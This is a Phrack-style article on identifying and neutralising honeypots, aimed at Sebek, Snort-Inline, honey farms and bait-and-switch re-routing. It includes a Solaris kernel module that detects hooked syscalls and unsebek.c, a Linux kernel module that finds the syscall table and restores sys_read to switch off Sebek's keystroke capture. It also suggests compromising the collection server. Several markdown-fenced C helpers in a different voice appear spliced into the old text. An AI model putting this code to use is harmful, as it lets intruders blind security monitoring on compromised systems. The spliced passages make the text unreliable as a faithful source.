                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x07 of 0x0f

|=------------------=[ Local Honeypot Identification ]=-----------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ Joseph Corey <jcorey@usa.net> ]=-----------------=|


"I pooped" - William Shakespeare


1 - Abstract

2 - Introduction

3 - Broken HoneyPots

4 - Detecting and Handling of Honeypot Devices
    4.1 - Sebek
          4.1.1 - Detecting Sebek Solaris
          4.1.2 - Detecting Sebek Linux
    4.2 - Snort-Inline And Dynamic Re-Routing
          4.2.1 - Connection or Block Limiting
          4.2.2 - Payload Alterations
          4.2.3 - Honey Farms
          4.2.4 - Dynamic Re-Routing (ala Bait and Switch)
	
5 - Conclusions

6 - Thanks

7 - References

--[ 1. Abstract

Honeypots and Honeynets are deployed on networks to detect and monitor 
misuse of computer and network resources by unauthorized individuals. 
Monitoring may take the form of high-interaction implementations[1], or 
low-interaction virtual honeypots[2].  The devices developed and the 
methods behind their development are based upon flawed assumptions and 
premises, ultimately permitting a determined adversary to detect, 
neutralize, and in some circumstances exploit deployed honeypot devices.
 
The AntiHoney.NET alliance was established to provide a forum for research 
into the limitations of honeypot technology, and for the development of
proof-of-concept tools that demonstrate those limitations. The results of
current research are presented within this paper, and the flaws in the
concept of honeypots, which permit the discovery and exploitation of
honeypot devices, are explored.

--[ 2. Introduction

The HoneyNET Project describes honeypots as closely monitored network
decoys that will provide soft-targets for would-be hackers to exploit.
The general hope is that attackers will take the low-hanging fruit, and
use it as a launching pad for further attacks against other, harder
targets. 

In their very essence, honeypots act as an anomaly-based intrusion
detection system. Any activity on the honeypot system is an anomaly due
to the system's dedicated purpose of trapping attackers. If an attacker
were to successfully penetrate a honeypot system, the very act of
interacting with the system, whether to deliver the exploit or to
conduct subsequent activities after the compromise, would tip off the
honeypot administrators, since any activity originating or terminating
at the honeypot system is suspect.

In addition to the value honeypots serve as an intrusion detection system,
honeypots may also be used as an intelligence gathering mechanism. By
luring hackers into an environment where their actions can be monitored,
honeypot researchers hope to learn how attackers behave, the motivations
behind their activities, and perhaps even capture some of the tools 
used in the active exploitation of computer systems. This purpose
was discussed in the book published by the HoneyNET project, "Know 
your Enemy"[3].

This has been of particular interest to the various intelligence 
agencies which take part in or support the mission of the Honeynet project,
evidenced by the grant from the CIA's National Intelligence Council to the 
HoneyNET project[4]. Other groups which have a documented interest in the 
intelligence gathering potential of honeynet technology include ABIN, the 
Mossad, CSIS, and w00w00. Additionally, organizations traditionally
interested in law enforcement have become interested in honeypots as
a way to detect, monitor, and collect evidence of online crimes, such
as with recent discoveries by the honeynet project of crime syndicates 
using compromised boxes to traffic in stolen credit card numbers.

The core devices for achieving this mission are Sebek, Snort-Inline, and 
the honeywall cdrom[5]. Other tools and methods, such as HoneyD[6] and
HoneyNET Farms[7], contribute to this mission, though they are not
directly funded by the NIC grant. We will examine each of these devices
in more detail, identifying how an adversary can detect their presence,
and with it the honeypot.

--[ 3. Flawed Honeypot premise

Any project based upon flawed premises will result in products no
less flawed than the premises they were based upon. This is the case with
the honeynet project, and the mechanisms that it develops. As a result of
these flawed devices being deployed by hapless security researchers,
unintended and potentially devastating results may occur. In the 'worst
case' scenario, misled honeypot administrators who subscribe to the flawed
premises of the honeynet project may find themselves in an uncomfortable,
or even life-threatening, situation if it is discovered that they are
running a HoneyPot and that honeypot is used by Romanian organized crime 
syndicates or foreign nation-states to conduct illegal activities with 
a presumption of anonymity. 

These flawed premises are:

        1. HoneyPot Technology may be openly shared and remain effective.

        2. HoneyPot Technology may be deployed in a hostile environment,
           and remain undetected.

        3. Even if detected, Attackers will not target the honeypot or
           its operators for further exploitation.

The first premise is central to the purpose of the HoneyNET Project. The
entire purpose of the HoneyNET Project, as stated, is to develop methods
to monitor attackers and share the results of that monitoring and
the methods with the public security community. However, if an adversary
knows how they are being monitored, the adversary is able to develop methods
to determine whether they are being monitored (as we will see in section 4)
or to falsify the information reaching the monitoring mechanisms. The
publication of products derived from the monitoring will, in itself, also
provide the adversary information on how they are being monitored [Waltz].

Because of the fallacy of the first premise, the second premise is also flawed.
Assuming an adversary knows they are being monitored, then it must be assumed
that a determined adversary will study the ways that the monitoring devices
operate. Any flaw in the way the devices operate, and how they are concealed
from the adversary under normal conditions would be then uncovered. By
creating these conditions in the wild, an adversary can then test for the
presence or absence of the monitoring mechanisms.

And finally, the third flawed premise. If an adversary knows a monitoring
device is present, it is only a little further for the adversary to go 
to be able to disable or turn the device to their own designs. If the
discovered flaws are of such a nature where the adversary can cause arbitrary
code execution, either as a result of the device or one of its supporting
code libraries, then the attacker may be able to compromise the supporting
systems that monitor the honeypot, and any other honeypots which trust that
supporting system.

 
--[ 4. Detecting and Handling of Honeypot Devices

Finding Honeypots is an art in itself. The whole of the purpose of the
honeypot is to covertly monitor the activities of a target audience, who
are technically skilled and are likely able to manipulate and query any
resources attached to the honeypot itself.  To these ends, honeypot
technology development closely mirrors the development of rootkits --
another technology whose purpose is to hide its presence from an
all-powerful user on a target computer system. In deploying honeypot
technology, modifications are made to a configured system and its network
to monitor activity, limit the damage that can be caused from the
honeypot, and conceal the presence of the previous two activities.

The acme of skill in finding honeypots is simply to find the
differences between a real system and a honeypot representation of a
system, subtle as they may seem. You see, the act of doping the box in
order to conceal the monitoring and reporting mechanisms is, in itself,
a modification to the structure of the system that can and will be
found. We will discover not only some current methods to find and expose
honeypots, but also how we can approach the problem when these signatures
are inevitably eliminated. 

----[ 4.1 Sebek 

Host Based Honeypot monitoring technology is focused on capturing and
preserving tools used on the honeypot and the actual activity on the
system by the monitored individual.  Typically the strategy has
been to dope the shells or other software running on the target system
in order to permanently save the commands executed by individuals operating
on the system. The ultimate form of this type of monitoring device is kernel
based modifications. The current and most sophisticated honeypot monitoring
device is the Sebek kernel module. In addition to capturing keystrokes,
it has been written as to be able to capture files as they are copied across
encrypted tunnels with the secure copy command.

Current avenues for discovering the presence of Sebek can be classified
as attacks against how sebek intercepts user input, and how it conceals
its communications with the back-end collection server. 

In order to be able to collect keystrokes from interactive users on a
monitored system, sebek hooks the system calls specific to reading in
input. As we will see, the very act of hooking into these system calls
leaves a footprint that can be checked, and in some situations, reversed
in order to disable the sebek monitoring capacity.

The backend communications to the server use specific features of the
communication packets in order to filter out the communications from the
view of a privileged user on the monitored systems. We will see that
it is possible to generate traffic in a controlled fashion so as
to discover the patterns that are being filtered. 

Before going further, it is suggested that the reader grab a copy of
Sebek from the honeynet website for review during the following
discussion. Sebek can be downloaded from the HoneyNET Toolz Armory
at http://www.honeynet.org/papers/honeynet/tools/index.html

------[ 4.1.1 Detecting Sebek Solaris

Solaris was the second operating system supported by Sebek. In order
to detect sebek we will want to focus on how it initializes itself. On
the Solaris platform that is done with the following code:

----Code Snippet of client/sebek.c in sebeksol-2.04.07---

     1	    /*
     2	     * Save the old values.
     3	     */
       

     4	    old_read = (int64_t (*)()) sysent[SYS_read].sy_callc;
     5	#ifdef sparc
     6	    old_read32 = (int64_t (*)()) sysent32[SYS_read].sy_callc;
     7	#endif
     8	    old_spec_ioctl = spec_vnodeopsp->vop_ioctl;
       

     9	    /*
    10	     * Switch to critical to reduce the risk of races and swap the
    11	     * function pointers.
    12	     */
       

    13	    s = ddi_enter_critical();
       

    14	    sysent[SYS_read].sy_callc = (int64_t(*)())new_read;
    15	#ifdef sparc
    16	    sysent32[SYS_read].sy_callc = (int64_t(*)())new_read;
    17	#endif
    18	    ddi_exit_critical(s);
       
----Code Snippet of client/sebek.c in sebeksol-2.04.07---

First, notice how sebek handles the sysent32 syscall table and the
old_read32 function pointer. It is obvious that this code has not been
strenuously tested. If it had been exercised on both 32 and 64 bit
systems, the authors would have found that it will not work on UltraSparc
systems running a 32bit kernel (i.e., UltraSparc systems with 143mhz cpus,
where solaris defaults to running in 32bit mode). 

But I digress. Poor coding and software testing are not the point of this
article. Notice how the kernel module replaces sy_callc with a pointer
to sebek's own function on lines 14 and 16? That's a signature right
there. What? You don't follow? Let me explain.

Typically, the SYS_read and SYS_write system calls are close to each
other. Since we can inspect the sysent (and sysent32) tables, we can
compare those two system calls to each other. 

For example, here is the output of a modified sebek.c file that outputs
the offsets of the sysent[] entries for SYS_write, and SYS_read. Notice
how the value of SYS_read changes.


SYS_WRITE              : 0x100abfc8
 
SYS_READ  WithOut Sebek: 0x100abc14
 
SYS_READ    With Sebek : 0x1028951c

Notice the difference between the positions of the functions? In the
clean sun kernel, prior to loading sebek's read system call, the
difference is 0x3b4, but in the sebek kernel the difference is nearly
0x200000 (0x1dd554)! That is about as subtle as finding a dead hooker
next to you in bed.
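
The arithmetic is easy to check by hand, but here is a minimal user-space
sketch of it in C. The function names handler_distance() and
looks_hooked() are made up for this illustration; the addresses fed to
them in the note below are the sample values printed above, and the
0x2000 limit is borrowed from the detection module in this section.

```c
#include <stdint.h>

/* Limit borrowed from the detection module in this section. */
#define HOOK_DISTANCE_LIMIT 0x2000ULL

/* Absolute distance between two handler addresses. */
uint64_t handler_distance(uint64_t a, uint64_t b)
{
    return (a > b) ? (a - b) : (b - a);
}

/* Nonzero when the read and write handlers sit suspiciously far apart. */
int looks_hooked(uint64_t write_addr, uint64_t read_addr)
{
    return handler_distance(write_addr, read_addr) > HOOK_DISTANCE_LIMIT;
}
```

Fed the clean pair (0x100abfc8, 0x100abc14) the distance is 0x3b4 and
nothing is flagged. Fed the sebek pair (0x100abfc8, 0x1028951c) the
distance is 0x1dd554 and the check trips. Taking the absolute value
matters, because the replaced handler may land above or below the
stock one.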

The following module can be used in solaris to test for the presence 
of Sebek:

----Begin------------Sebek-Find-Solaris.c-----------------------------
/*
 * Detect Sebek Running on Solaris Systems.
 * Adapted from the Sebek Solaris kernel module.
 *
 * Copyright 2003, Phrack Labs
 *
 */
#ifdef __GNUC__
#define _SYS_VARARGS_H
#define _VARARGS_H
#include <stdarg.h>
#endif

#include <values.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/conf.h>
#include <sys/vnode.h>
#include <sys/file.h>
#include <sys/cred.h>
#include <sys/stream.h>
#include <sys/strsubr.h>
#include <sys/stropts.h>
#include <sys/systm.h>
#include <sys/pathname.h>
#include <sys/exec.h>
#include <sys/thread.h>
#include <sys/modctl.h>
#include <sys/syscall.h>
#include <sys/errno.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/autoconf.h>
#include <sys/dirent.h>
#include <sys/kmem.h>
#include <sys/mem.h>
#include <sys/bootconf.h>
#include <sys/reboot.h>
#include <sys/vmparam.h>
#include <sys/var.h>
#include <sys/regset.h>
#include <sys/procfs.h>
#include <sys/tihdr.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <sys/fs/ufs_inode.h>
#include <sys/fs/snode.h>
#include <sys/proc/prdata.h>
#include <sys/dlpi.h>
#include <sys/corectl.h>
#include <sys/sad.h>

#if SOL_MINVER >= 6
# include <net/if_types.h>
#endif
#include <net/af.h>
#include <net/route.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip6.h>
#include <sys/byteorder.h>

#include <net/if.h>
#include <inet/common.h>
#include <inet/ip.h>
#include <inet/mib2.h>
#include <inet/tcp.h>

#ifdef __sparcv9
#include <v9/sys/privregs.h>
#endif

#if defined(__sparcv7) || defined(__sparcv8)
#include <v7/sys/privregs.h>
#endif


/* Module description */
static struct modlstrmod modlstrmod = {
  &mod_strmodops,
  "aha-sebek",
  &fsw
};

static struct modlinkage modlinkage = {
    MODREV_1, {(void *) &modlstrmod, NULL}
};

/*
 * Structure of the system-entry table.
 */
extern struct sysent sysent[];

static struct modctl *my_mp = NULL;

int _init(void)
{

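    unsigned long rd, wr, dist;

    /* The stock read and write handlers sit close together in memory. */
    rd = (unsigned long) sysent[SYS_read].sy_callc;
    wr = (unsigned long) sysent[SYS_write].sy_callc;
    dist = (wr > rd) ? (wr - rd) : (rd - wr);

    /* A large gap suggests one of the handlers was replaced by a module. */
    if (dist > 0x00002000)
      cmn_err(CE_WARN,"NOTICE: Possible HoneyPot Detected.\n");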
        
   return (mod_install(&modlinkage));
}

int _fini()
{
    return (mod_remove(&modlinkage));
}

int _info(struct modinfo * modinfop)
{   
    return (mod_info(&modlinkage, modinfop));
}

----End--------------Sebek-Find-Solaris.c-----------------------------


------[ 4.1.2 Detecting Sebek Linux

In linux, the situation is exactly the same, but with one sweet
modification -- in more recent kernels the sys_read function is an
exported symbol. Because it is exported, sebek can even be
disabled! To understand why, one has to understand recent changes in the
linux kernel.

During the development of the linux 2.5.x kernels, it was decreed that
the sys_call_table will no longer be exported as a symbol to kernel
modules. On the surface this would appear to hinder modules such as
sebek which use the sys_call_table. However, when some of those patches
were being back ported into the 2.4 tree, workarounds to finding the
sys_call_table in memory quickly appeared. 

Some system calls are necessary for some kernel modules to operate. It
is handy from a kernel module perspective to be able to read in and
write files during load and operation. To make this possible, even with
the un-exported sys_call_table, the symbols for some previously
un-exported system calls were exported. Amongst those were sys_open,
sys_close, sys_write, and sys_read. 

Now, knowing where sys_read is in memory is important, because that
means that if one were to use the same sys_call_table finding methods
that appeared on the scene, combined with the differential analysis of
sys_call_table pointers, one could determine that the sys_read function
had been replaced and repair the sebek'd kernel by replacing the value
in the sys_call_table with the original (exported) sys_read value.

Below is some code someone left out on their web server that can easily
remove sebek from sebek-infected kernels:


----unsebek.c---

#define MODULE
#define __KERNEL__
#include <asm/unistd.h>
#include <linux/sys.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h>
#include <linux/types.h>

extern int loops_per_jiffy;

int init_module(void)
{

	unsigned long ptr;
	unsigned long **sct = NULL;

	MODULE_LICENSE("GPL");

	lock_kernel();

	/* The system call table is no longer exported, so scan kernel
	   data for a table whose __NR_close slot points at sys_close.
	 */

	for (ptr = (unsigned long) &loops_per_jiffy;
		ptr < (unsigned long) &boot_cpu_data; ptr += sizeof(void *))
	{

		unsigned long *p;
		p = (unsigned long *)ptr;

		if (p[__NR_close] == (unsigned long) sys_close) {
			sct = (unsigned long **)p;
			break;
		}
	}

	/* Bail out if the table was not found. */
	if (sct == NULL) {
		unlock_kernel();
		return -1;
	}

	/* Uber 31337 Sebek disabling code begins here. */

	sct[__NR_read] = (unsigned long *) sys_read;

	/* Uber 31337 Sebek disabling code ends here. */

	unlock_kernel();
	return 0;
}

int cleanup_module(void)
{
	return 0;
}

----unsebek.c---

That's it! This module is even safe to run on systems that are not
infected with sebek. In that case, all it does is assign the value already
stored in the sys_call_table's __NR_read slot back to itself.

After disabling sebek, no keystrokes or ssh transfers will be captured.
For some added fun, one could extend the module to determine if the
sys_read value matches what's in the sys_call_table. Once it's known that
sebek is present, one can find the MAC address the remote sebek sniffer is
running with and exploit a vulnerability in the software to control the
data collection host.

----[ 4.2 - Snort-Inline And Dynamic Re-Routing

Running a high-interaction honeypot can be a perilous feat. What if
someone compromises the honeypot system and uses it to launch a massive
attack against a high-profile target, like www.ebay.com? Would the
honeypot administrator be liable for negligence in leaving an unsecured
system connected to the network? Questions like these are what keep
honeypot alliance members up at night. In order to give some cover, and
make an argument of due diligence, a product dubbed snort-inline is used
by the HoneyNET alliance to limit the amount of damage that can be caused
from a compromised honeypot. 

Snort-Inline is based off of the wildly popular, and somewhat stolen,
Intrusion Detection system called Snort. The purpose of Snort-Inline
is to monitor on-going traffic and respond to that traffic in real-time.
The HoneyNET project typically either uses this responsive capability
to limit the number of outbound connections on a honeypot, or to alter
outgoing packets that are detected to be associated with an attack being
launched from the honeypot. Both of these activities are not very subtle,
and may be detected. 

------[ 4.2.1 Connection Limiting

This is perhaps one of the easiest things to detect. In the connection 
limiting configuration, snort-inline will count the number of outbound
connections within a period of time, and deny new outbound connections
once a threshold is reached. 

To detect this, simply open up a good number of outbound connections
to several hosts. A good list of 10-20 high-profile websites is
recommended. A manual connection with a basic retrieval of their
main webpage will suffice to provide the connections while appearing
benign at the network level. 

Duh.
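
For those who want it spelled out, here is a minimal sketch in C of how
the results could be read. It does no networking itself. It assumes you
have already recorded, in order, whether each outbound attempt succeeded.
The function name connection_cap_index() is invented for this example.

```c
#include <stddef.h>

/*
 * ok[i] is nonzero if the i-th outbound connection attempt succeeded.
 * Returns the index of the first failure when every attempt before it
 * succeeded and every attempt from it onward failed, which is the
 * pattern a hard connection cap would produce. Returns -1 otherwise.
 */
int connection_cap_index(const int *ok, size_t n)
{
    size_t i, first_fail = n;

    for (i = 0; i < n; i++) {
        if (!ok[i]) {
            first_fail = i;
            break;
        }
    }
    if (first_fail == 0 || first_fail == n)
        return -1;          /* nothing worked, or nothing was blocked */
    for (i = first_fail; i < n; i++) {
        if (ok[i])
            return -1;      /* a later success rules out a hard cap */
    }
    return (int)first_fail;
}
```

A clean run of successes followed by nothing but failures is the
interesting case. A scattering of failures is more likely an ordinary
flaky network than a limiter.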

------[ 4.2.2 Payload Alterations

Even if an attacker is able to connect out to one other host, it may 
be possible for that one host to be the mega high-profile target that
will cause the wrath of Homeland Security to rain down upon the
honeynet administrator like Microsoft's SWAT team taking down the
author of a crappy variant of Blaster. Because of this, the other 
feature of Snort-Inline was developed. Using snort rules to detect
certain substrings in outgoing traffic, Snort-Inline will modify
outbound packets that it believes to be of an exploitive nature
in such manner as to cause the exploit to fail. One oft-cited example
is the modification of shellcode attempting to execute "/bin/sh" to 
"/ben/sh". 

Phrack Labs has studied this situation carefully. The answer we 
found is actually based upon one of the products developed
for the HoneyNET Project. Using a honeyd server, custom scripts are
written to simulate an exploitable service. However, instead of actually
looking for service commands, at the point where a payload should
be delivered, the server will compute a hash of various portions
of the payload, and return a response based upon the result of the
hash.

By comparing the benign return message to what is expected, 
it is possible to determine if snort-inline is present and modifying
payloads. If modified payloads result, it is highly likely the
suspect system is a honeypot.
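
The comparison step can be sketched in C as follows. The text above does
not say which hash the simulated service computes, so 32-bit FNV-1a is
used here purely as a stand-in, and the names fnv1a32() and
payload_was_altered() are invented for this illustration. The sender
hashes what it sent and compares that against the value the far end
reports.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit FNV-1a; a stand-in for whatever hash the service really uses. */
uint32_t fnv1a32(const void *data, size_t len)
{
    const unsigned char *p = data;
    uint32_t h = 2166136261u;       /* FNV offset basis */
    size_t i;

    for (i = 0; i < len; i++) {
        h ^= p[i];
        h *= 16777619u;             /* FNV prime */
    }
    return h;
}

/*
 * Nonzero when the hash reported by the far end does not match the
 * payload as it was sent, i.e. something rewrote it in transit.
 */
int payload_was_altered(const void *sent, size_t len, uint32_t reported)
{
    return fnv1a32(sent, len) != reported;
}
```

If the far end saw "/ben/sh" where "/bin/sh" was sent, the reported hash
will not match the local one and payload_was_altered() returns nonzero.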

------[ 4.2.3 Honey Farms

The idea of honey farms is perhaps the most marketable idea that 
has come out of the HoneyNET Project. The concept is that a company 
would pay the operator of a HoneyNET farm to run and maintain honeypots 
for the client company. IP addresses within the client company would be 
assigned to the HoneyNET Farm, and traffic to those ip addresses would be 
transparently bridged across a VPN to the Honey Farm Network Operations 
Center, where a crack staff would study the every move of villainous
hackers that threaten the client network. 

Without getting into too much of a discussion of the high-tech
wizardry that goes into setting up a Honey Farm configuration, we will
simply point out that the latency between an attacker's machine and the
honeyfarm will vary from the latency between an attacker's machine and
other systems located on the client network and on the same broadcast
domain as the honeyfarm systems. If the honeyfarm is isolated in its
own broadcast domain, and routing is performed, the latency may be
less of an issue for multi-site and geographically spread-out
networks.

The measurement of this latency will occur outside of the bounds
of the communication channel between the honeyfarm and the attacker.
Specifically, it is made against the clock on the attacker's wall. Because
this measure is out of bounds of the communication between the two
parties, there is little if anything that can be done from
the honeyfarm's side to hide this telling anomaly. 
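
As a rough illustration, the comparison might look like the C sketch
below. It assumes round-trip times (in milliseconds) have already been
collected for the suspect address and for a neighbour on the same
network. The names median_ms() and latency_outlier(), and the idea of
comparing medians against a multiplier, are choices made for this
example and not anything prescribed above.

```c
#include <stdlib.h>
#include <string.h>

/* qsort comparator for doubles. */
static int cmp_double(const void *a, const void *b)
{
    double x = *(const double *)a, y = *(const double *)b;
    return (x > y) - (x < y);
}

/* Median of n round-trip samples (milliseconds); -1.0 on error. */
double median_ms(const double *samples, size_t n)
{
    double *tmp, m;

    if (n == 0 || (tmp = malloc(n * sizeof *tmp)) == NULL)
        return -1.0;
    memcpy(tmp, samples, n * sizeof *tmp);
    qsort(tmp, n, sizeof *tmp, cmp_double);
    m = (n % 2) ? tmp[n / 2] : (tmp[n / 2 - 1] + tmp[n / 2]) / 2.0;
    free(tmp);
    return m;
}

/* Nonzero when the suspect's median RTT exceeds factor times the
   neighbour's median RTT. */
int latency_outlier(const double *suspect, size_t ns,
                    const double *neighbour, size_t nn, double factor)
{
    double s = median_ms(suspect, ns), b = median_ms(neighbour, nn);

    if (s < 0.0 || b < 0.0)
        return 0;
    return s > b * factor;
}
```

The median is used instead of the mean so that a single slow reply does
not skew the comparison. What multiplier counts as suspicious depends on
the network and has to be picked by hand.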

------[ 4.2.4 Dynamic Re-Routing (ala Bait and Switch)

The problem with honeypots is that they are not interesting targets
in and of themselves. You'll likely not find a production honeypot
running as a production server, unless you're looking at ISS's network.
Honeywall, and the project the idea was based upon, Bait-n-Switch,
work to redirect network packets normally targeted at a 
production server over to a honeypot at the first sign of anomalous
behavior. 

For example, if windowsupdate.microsoft.com had a honeywall in front
of them, the first time it saw a webdav request, it would forward
all traffic from the nsecure.com host attacking it to the honeypot.

It's a neat idea -- fronting high-profile and high-value targets with
honeypots. However, the idea is flawed.

The honeypot will have to be isolated from the production system. This is
to ensure that the honeypot is not used as a launching platform to
infect production systems. This means that the honeypot will have to
mimic the state of the production system, without any input from
the production system beyond when they were last manually synchronized
with each other. 

These differences in state between a normally busy production box
and a normally idle (excluding simulated traffic) honeypot provide
a multitude of signatures that can be used to identify the 
re-routing to a honeypot. 

Assume an attacker controls two systems. System A will be used for
attack. System B will be a control system, that will only make normal
(legitimate) connections to the production system. Further, assume
system A has already triggered the suspicions of the IDS controlling
the Honeywall. For the sake of this example, let's assume that both the
production system and the honeypot are running Windows 2000 server with
IIS.

If the attacker just monitored the IPIDs coming from the honeypot and
the production server he would see that they do not match. Further, 
the IPIDs would likely increment more slowly across the samples taken by
System A than across those taken by System B. 

These samples can be taken remotely, and definitively reveal that
someone is playing some routing games for connections coming from 
System A.
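
A minimal sketch of that comparison in C follows. It assumes the target
uses a single incrementing IPID counter, and that both systems sampled
the IPID of replies at the same fixed interval. The function names
ipid_mean_step() and ipid_rates_diverge() and the ratio parameter are
invented for this example.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Mean increase between consecutive IPID samples, treating the field
 * as a 16-bit counter that wraps. Returns 0.0 for fewer than 2 samples.
 */
double ipid_mean_step(const uint16_t *ids, size_t n)
{
    unsigned long total = 0;
    size_t i;

    if (n < 2)
        return 0.0;
    for (i = 1; i < n; i++)
        total += (uint16_t)(ids[i] - ids[i - 1]);   /* modulo 65536 */
    return (double)total / (double)(n - 1);
}

/* Nonzero when the counter seen by A advances at less than ratio times
   the rate of the counter seen by B. */
int ipid_rates_diverge(const uint16_t *a, size_t na,
                       const uint16_t *b, size_t nb, double ratio)
{
    double ra = ipid_mean_step(a, na), rb = ipid_mean_step(b, nb);

    return rb > 0.0 && ra < rb * ratio;
}
```

A busy production box burns through IPIDs between samples, while an idle
honeypot barely moves. If System A sees steps of 1 while System B sees
steps in the hundreds, the two are not talking to the same machine.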

--[ 5. Conclusions

The effectiveness of honeypot technology only exists as long as the 
opponents of the purpose of the honeypot are not able to examine 
the workings of the monitoring and control technologies. Essentially,
the honeypot technologies must remain secret in order for them to be
effective in the field. This precludes the option of having
an open discourse on the technology, since one can't even trust the
alliance members not to leak 0day Honeypot Warez to their blackhat friends. 

On the other hand, without open discourse, honeypot development will
stall, no media attention will be given to the false prophets of honeypot
technology, and the lucrative contracts that come with selling digital
snake oil[XX] will not materialize. 

In either circumstance, HoneyPot Technology is far too immature to be
seriously considered for real deployment by anyone other than academics
and dot-com refugees.

--[ 6. Thanks

A Special Thanks to K2 for his support in keeping up with what
is going on in the honeynet project. Keep those Emails Coming!

--[ 7. References

Too Many to Mention. 




|=[ EOF ]=---------------------------------------------------------------=|
